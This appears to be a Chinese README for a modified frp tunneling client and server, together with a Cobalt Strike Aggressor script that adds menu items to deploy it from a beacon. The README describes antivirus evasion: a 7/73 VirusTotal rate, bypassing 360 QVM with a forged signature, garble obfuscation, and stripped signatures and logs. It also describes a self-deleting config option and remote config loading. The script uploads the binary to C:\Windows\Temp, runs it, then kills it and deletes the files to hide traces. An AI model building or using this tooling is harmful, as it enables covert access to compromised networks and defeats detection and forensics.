本项目是基于frp 0.58.1的二开项目
VT查杀 7/73 加签名后可过QVM
项目进行了如下改动
包括静态特征 流量特征 删除了大部分的log输出 使用garble编译混淆
修改默认的-c指定配置文件为-o
加入配置文件自删除参数-s或者--suicide
远程加载配置文件:frpc.exe -r http://127.0.0.1/frpc.toml
添加资源文件 用来过360QVM 2024.07.02 19:00 测试 加上资源文件并伪造签名后可过QVM
如需修改icon 更换根目录icon.ico 并执行
go install github.com/akavel/rsrc@latestrsrc -ico icon.ico -o ./cmd/frpc/icon.syso
rsrc -ico icon.ico -o ./cmd/frps/icon.syso基于xq17师傅的插件进行改写
使用方式:
cs直接加载cs_frp_plugin文件夹中的frp.cna
upload 上传frpc.exe frpc.toml
run 执行frpc并删除配置文件
delete 杀进程删文件
popup beacon_bottom {
menu "Frp"{
item "Upload" {
$bid = $1;
$dialog = dialog("Upload frpc", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &upload);
drow_text($dialog, "UploadPath", "path: ");
dbutton_action($dialog, "ok");
dialog_show($dialog);
}
sub upload {
# switch to specify path
bcd($bid, $3['UploadPath']);
bsleep($bid, 0 ,0);
bupload($bid, script_resource("/scripts/frpc.toml"));
bupload($bid, script_resource("/scripts/frpc.exe"));
show_message("Executing cmmand!");
}
item "Run"{
$bid = $1;
$dialog = dialog("Run frpc", %(uri => "frpc.toml -s", bid => $bid), &run);
drow_text($dialog, "uri", "configURI: ");
dbutton_action($dialog, "ok");
dialog_show($dialog);
}
sub run{
local('$Uri');
$Uri = $3['uri'];
bshell($bid, "frpc.exe -o $+ $Uri ");
show_message("Executing cmmand!");
bsleep($bid, 10, 0);
}
item "Delete" {
# local("bid");
bshell($1, "taskkill /f /t /im frpc.exe && del /f /s /q frpc.exe");
}
}
}